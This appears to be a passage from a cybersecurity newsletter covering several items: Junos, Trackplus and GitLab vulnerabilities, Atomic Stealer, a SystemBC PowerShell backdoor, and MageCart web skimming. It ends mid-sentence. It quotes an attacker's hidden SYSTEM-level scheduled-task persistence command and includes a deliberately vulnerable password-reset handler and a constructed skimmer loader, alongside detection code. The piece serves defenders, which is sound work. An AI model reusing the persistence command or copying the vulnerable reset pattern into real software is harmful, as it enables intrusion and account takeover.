Affected Component: Allegra Service Desk Module in Trackplus.
Exploitation Scenario: Attackers can execute arbitrary code on the affected system.
Mitigation: Organizations using Trackplus are advised to apply patches promptly; CVE-2023-50164 affects unpatched Trackplus versions.
SystemBC PowerShell Backdoor Incident:
Incident Report: Discovery of a PowerShell backdoor orchestrated through SystemBC.
Attack Vector: Usage of PowerShell for stealthy and versatile malicious activities.
Detection and Response: Organizations encouraged to enhance PowerShell script visibility and deploy security measures to detect and mitigate SystemBC-related threats.
🚨 Vulnerability of the Week
Juniper Networks has addressed a critical pre-authentication remote code execution (RCE) vulnerability, identified as CVE-2024-21591, in Junos OS on SRX firewalls and EX switches. This vulnerability could allow an unauthenticated, network-based threat actor to execute a range of attacks, including denial-of-service (DoS), RCE, or potentially gain root privileges on exposed devices.
CVE ID: CVE-2024-21591
Vulnerability Type: Out-of-bounds write
Impact: Unauthenticated attackers could exploit this vulnerability to carry out DoS attacks, RCE attacks, or potentially gain root privileges.
Discovery: Discovered during external security research.
Affected Versions: The vulnerability affects the following Junos OS SRX Series and EX Series versions:
Junos OS versions earlier than 20.4R3-S9
Junos OS 21.2 versions earlier than 21.2R3-S7
Junos OS 21.3 versions earlier than 21.3R3-S5
Junos OS 21.4 versions earlier than 21.4R3-S5
Junos OS 22.1 versions earlier than 22.1R3-S4
Junos OS 22.2 versions earlier than 22.2R3-S3
Junos OS 22.3 versions earlier than 22.3R3-S2
Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3
Patch Information: Juniper Networks has released patches for the vulnerability in the following Junos OS versions: 20.4R3-S9, 21.2R3-S7, 21.3R3-S5, 21.4R3-S5, 22.1R3-S4, 22.2R3-S3, 22.3R3-S2, 22.4R2-S2, 22.4R3, 23.2R1-S1, 23.2R2, 23.4R1, and all subsequent releases. Administrators are strongly advised to apply the patches immediately.
Mitigation Steps: In cases where immediate patching is not feasible, administrators are urged to take the following mitigation steps:
Disable the J-Web interface.
Allow access to the J-Web interface only from trusted hosts.
Current State: As of now, Juniper SIRT (Security Incident Response Team) is not aware of any malicious exploitation of this vulnerability. However, Censys reports over 10,000 exposed J-Web interfaces online, mainly in Asia (South Korea, Hong Kong, China) and the US.
🥵 Malware or Ransomware
RussianPanda’s latest blog post delves into the technical intricacies of Atomic Stealer, the first-known stealer targeting MacOS devices. Here are the key takeaways:
Discovery: Atomic Stealer emerged in March 2023, becoming the inaugural stealer designed for MacOS.
Monetary Model: Priced at $3000 per month, users gain access to the stealer’s panel by providing a Telegram Bot ID and build ID to the seller.
Functionality and Features:
Capabilities: The stealer boasts various functionalities, including keychain dumping, system information extraction, file grabbing (Desktop, Documents), MacOS password retrieval, a user-friendly web panel, MetaMask brute-forcing, crypto-checking for assets, and Telegram logs.
Supported Browsers: The stealer supports multiple browsers, including Chrome, Firefox, Brave, Edge, Vivaldi, Yandex, Opera, and OperaGX. Additionally, it targets various wallets and plugins.
Developer Identification: Cyble identified the Go source code path containing the username “iluhaboltov,” suggesting the developer’s name might be Ilya Boltov.
Evolution: A new version of Atomic Stealer surfaced in December 2023, encrypting all strings using XOR operations.
Anti-VM Measures: The stealer implements anti-VM checks, with commands like “system_profiler SPHardwareDataType” to identify virtual machines.
Data Collection: Atomic Stealer collects a range of data, including Chromium-based browser information, passwords, system details, and display configurations.
Encryption Algorithm: The new version utilizes XOR operations in a specific algorithm to encrypt strings, making the decryption process more intricate.
Detection Rules and Indicators of Compromise:
Yara Rules: The blog provides Yara rules for detecting Atomic Stealer.
Indicators: Indicators of compromise include hash values for old and new versions of Atomic Stealer, C2 server IP addresses, and other reference links.
During a recent engagement, a threat actor successfully installed the PowerShell version of SystemBC as a backdoor on the target system. Despite the different Command and Control (C2) address, the code matched a sample identified on VirusTotal. Subsequently, an Endpoint Detection and Response (EDR) product was deployed on the affected host(s) after the attacker created a malicious scheduled task. This task periodically executed the SystemBC PowerShell code.
EDR Detection Failure: Notably, the EDR product failed to identify the malicious code or its associated behavior. This underscores the importance of thorough investigation during Incident Response engagements, emphasizing the need to rely on more than just tool-based detection.
Incident Analysis: The attacker utilized the following command to create the scheduled task:
schtasks.exe /create /sc ONSTART /tn System /tr "Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -File C:\Windows\Tasks\svchost64.ps1" /ru system
This command provides opportunities for detection through various means, and the report outlines several techniques for identifying the backdoor and traces of its installation.
PowerShellReadLine Log: The exact command executed by the attacker is logged within the PowerShellReadLine file, offering an initial point of detection.
Velocidex Hunts: Using Velocidex, specific hunts can be conducted to identify the persistence created by the attacker. Examples include hunts from DetectRaptor.Windows.Detection.Evtx.
AutoRuns: As a widely-used tool, AutoRuns can be employed to identify the persistence listed under Task Scheduler, providing a straightforward detection method.
Windows System TaskScheduler: By filtering for the latest installed tasks and scrutinizing those running PowerShell scripts from uncommon locations, suspicious activity related to the backdoor can be identified.
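As an added example (not from the report or the responders' tooling), the detection points above applied in Python to constructed command-history lines: every schtasks /create line that launches PowerShell is scored on the traits of the incident's task (ExecutionPolicy Bypass, hidden window, a script under C:\Windows\Tasks or a similar location, SYSTEM context, a lookalike task name, boot or logon trigger). The uncommon-directory list and lookalike task-name list are assumptions.

```python
import re

# Constructed sample lines standing in for a PowerShellReadLine history file or
# process-creation telemetry; they are not real incident data.
SAMPLE_LOG = r"""
schtasks.exe /create /sc ONSTART /tn System /tr "Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -File C:\Windows\Tasks\svchost64.ps1" /ru system
schtasks.exe /create /sc DAILY /tn NightlyBackup /tr "C:\Program Files\Backup\run.exe" /ru system
schtasks.exe /create /sc ONLOGON /tn Updater /tr "powershell.exe -File C:\Users\Public\update.ps1"
Get-ScheduledTask | Where-Object { $_.State -eq 'Ready' }
"""

# Directories an administrator-deployed script rarely lives in (assumed list).
UNCOMMON_SCRIPT_DIRS = (r"c:\windows\tasks", r"c:\users\public", r"c:\programdata",
                        r"c:\windows\temp", r"\appdata\local\temp")
# Task names that impersonate built-in components (the incident used "System").
LOOKALIKE_TASK_NAMES = {"system", "svchost", "windows update", "microsoft"}

def _arg(flag, line):
    """Return the value of a schtasks switch, handling quoted values."""
    m = re.search(rf'{flag}\s+(?:"([^"]*)"|(\S+))', line, re.I)
    return (m.group(1) or m.group(2)) if m else ""

def analyze_schtasks_line(line):
    """Score a 'schtasks /create' line that launches PowerShell; None otherwise."""
    if not re.search(r"schtasks(?:\.exe)?\s+/create", line, re.I):
        return None
    action = _arg("/tr", line)
    if "powershell" not in action.lower():
        return None
    indicators = []
    if re.search(r"-e\w*\s+bypass", action, re.I):      # -ExecutionPolicy / -ep Bypass
        indicators.append("executionpolicy_bypass")
    if re.search(r"-w\w*\s+hidden", action, re.I):      # -WindowStyle / -w hidden
        indicators.append("hidden_window")
    script = re.search(r'-f\w*\s+"?([^"\s]+\.ps1)', action, re.I)
    if script and any(d in script.group(1).lower() for d in UNCOMMON_SCRIPT_DIRS):
        indicators.append("script_in_uncommon_dir")
    if _arg("/ru", line).lower() == "system":
        indicators.append("runs_as_system")
    if _arg("/tn", line).lower() in LOOKALIKE_TASK_NAMES:
        indicators.append("lookalike_task_name")
    if _arg("/sc", line).upper() in {"ONSTART", "ONLOGON"}:
        indicators.append("boot_or_logon_persistence")
    return {"task": _arg("/tn", line), "script": script.group(1) if script else None,
            "indicators": indicators, "score": len(indicators)}

def scan_log(text, min_score=2):
    """Return findings scoring at least min_score, highest score first."""
    found = [f for f in (analyze_schtasks_line(l) for l in text.splitlines()) if f]
    return sorted((f for f in found if f["score"] >= min_score), key=lambda f: -f["score"])
```

The same scoring can be applied to the Task Scheduler event log or Autoruns output once the task's action string has been extracted.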
🥷 TTP Analysis
The fashion and lifestyle brand Khaadi, operating in Pakistan, Great Britain, and the UAE, is currently experiencing an ongoing compromise by MageCart, a notorious web skimming group. The compromised URLs and exfiltration URLs have been identified.
Incident Details: MageCart is actively running a web skimming campaign affecting numerous e-commerce websites, including Khaadi. The attackers employ different modus operandi through various threat groups, demonstrating a high level of sophistication.
Compromised over 40 e-commerce websites.
Data collected was encoded, encrypted, and sent to a Russian exfiltration server.
Some impacted websites did not remove the outdated script, contributing to the compromise.
Injected a Google Analytics lookalike script into home pages individually.
Loader script checks the checkout page, loading the skimmer only if necessary.
Custom version of a fake Google Analytics integration, similar to Group X.
Exfiltration to a different endpoint under the same domain.
Utilizes a similar methodology to Group Y and X.
Skimmer code undergoes modifications in script structure and server structure.
Exfiltration occurs to two domains, identifying the service used to disguise and the target website.
Web Skimmer Operation Insights:
Lack of website visibility into third-party scripts creates a security blind spot.
MageCart employs various tactics to inject skimming code, including disguising as discontinued libraries and injecting lookalike scripts.
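An added example, not Khaadi's or any vendor's code, of the third-party script visibility the last point calls for: a Python audit that lists a page's script sources against an allowlist, flags hosts that imitate analytics brands, and spots inline loaders that only fetch more code on checkout-like paths (the loader behaviour noted above). The allowlist, brand tokens and sample page are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Known-good script hosts for a constructed storefront; everything else is reviewed.
ALLOWED_HOSTS = {"www.google-analytics.com", "www.googletagmanager.com", "cdn.example-shop.test"}
BRAND_TOKENS = ("google", "analytics", "gtag", "tagmanager")  # fragments lookalike hosts borrow

class _ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_inline = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline = True
                self.inline.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False
    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data

def audit_page(html):
    """Return findings: unapproved/lookalike script hosts and checkout-gated inline loaders."""
    p = _ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = (urlparse(src).hostname or "").lower()
        if not host or host in ALLOWED_HOSTS:      # same-origin or allowlisted
            continue
        kind = "lookalike_host" if any(t in host for t in BRAND_TOKENS) else "unapproved_host"
        findings.append({"kind": kind, "src": src})
    for code in p.inline:   # a loader that injects a script only on checkout pages
        if re.search(r"checkout|payment", code, re.I) and re.search(r"""createElement\(\s*['"]script""", code):
            findings.append({"kind": "conditional_loader", "src": code.strip()[:60]})
    return findings

# Constructed page: a real tag manager, a lookalike host, and a conditional loader.
SAMPLE_HTML = """<html><head>
<script src="https://www.googletagmanager.com/gtag/js?id=G-XXXX"></script>
<script src="https://google-analytics-cdn.example/ga.js"></script>
<script>if (location.pathname.indexOf('checkout') !== -1) {
  var s = document.createElement('script'); s.src = '//stats.example/x.js'; document.head.appendChild(s); }
</script><script src="/static/app.js"></script></head><body></body></html>"""
```

Running the audit on a schedule and diffing its output against the previous run turns an unannounced script change into an alert rather than a blind spot.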
Description: A critical vulnerability has been identified in the Allegra Service Desk Module of Trackplus, tracked as CVE-2023-50164. This flaw allows remote attackers to execute arbitrary code on affected installations. Although authentication is required, the default enablement of the guest account registration exacerbates the risk.
The vulnerability originates from a flaw in the Struts core dependency: by exploiting it, an attacker can perform a directory traversal that leads to the execution of arbitrary code within the application's context.
Vendor Response: Trackplus has promptly responded to this security issue by issuing an update. Users are strongly advised to apply the necessary patches to secure their installations. Detailed information about the update can be found in the vendor’s release notes at Trackplus Release Notes.
2023-12-21: Vendor silently patches the vulnerability.
2024-01-15: Public release of advisory.
Proof of Concept: A proof of concept demonstrating the vulnerability is available in the form of a Python script, accessible at src-2024-0001.py.txt. Organizations and security professionals are urged to use this POC responsibly for testing and remediation purposes only.
Credit: This critical vulnerability was discovered by Steven Seeley of Source Incite. The dedication of security researchers such as Steven is vital in identifying and mitigating potential threats.
The vulnerability is rooted in the mishandling of emails during password reset procedures. An attacker can exploit this by providing two email addresses, where the reset code will be sent to both. By specifying the email address of the target account and the attacker’s email, the attacker can reset the administrator password. GitLab notes that two-factor authentication (2FA) mitigates this vulnerability since an attacker, even after resetting the password, won’t be able to log in without the second authentication factor.
This vulnerability was discovered by asterion04.
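An added Python example, not GitLab's code, of the flaw as described beside a hardened version: the vulnerable handler accepts the email field as an array and mails one reset token to every address in it, while the fixed handler accepts a single address, uses it only to look the account up, and mails the token solely to the address stored on that account. The Rails-style user[email][] form key and the in-memory store are assumptions.

```python
import secrets
from urllib.parse import parse_qs

# Constructed in-memory account store; verified_email is the address on file.
USERS = {"admin": {"verified_email": "admin@example.test"}}

def _find_user_by_email(email):
    return next((u for u, d in USERS.items() if d["verified_email"] == email), None)

def reset_vulnerable(query, outbox):
    """Flawed pattern: the email field is accepted as an array, and the single
    reset token is mailed to every address in it, not just the one on file."""
    emails = parse_qs(query).get("user[email][]", [])
    user = None
    for e in emails:
        user = user or _find_user_by_email(e)
    if user is None:
        return None
    token = secrets.token_urlsafe(16)
    for e in emails:        # a second, requester-chosen address also receives the token
        outbox.append((e, token))
    return token

def reset_hardened(query, outbox):
    """Fixed pattern: exactly one address is accepted, it is used only to look the
    account up, and the token goes solely to the address stored on that account."""
    emails = parse_qs(query).get("user[email]", [])
    if len(emails) != 1:
        return None
    user = _find_user_by_email(emails[0])
    if user is None:
        return None         # a real service would answer identically here to avoid enumeration
    token = secrets.token_urlsafe(16)
    outbox.append((USERS[user]["verified_email"], token))
    return token

def recipients(outbox):
    """Addresses that received a token, for inspection."""
    return sorted(e for e, _ in outbox)
```

As the advisory notes, 2FA limits the damage of the flawed handler, but the hardened handler removes the leak itself.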
Payload: The payload is demonstrated using two methods: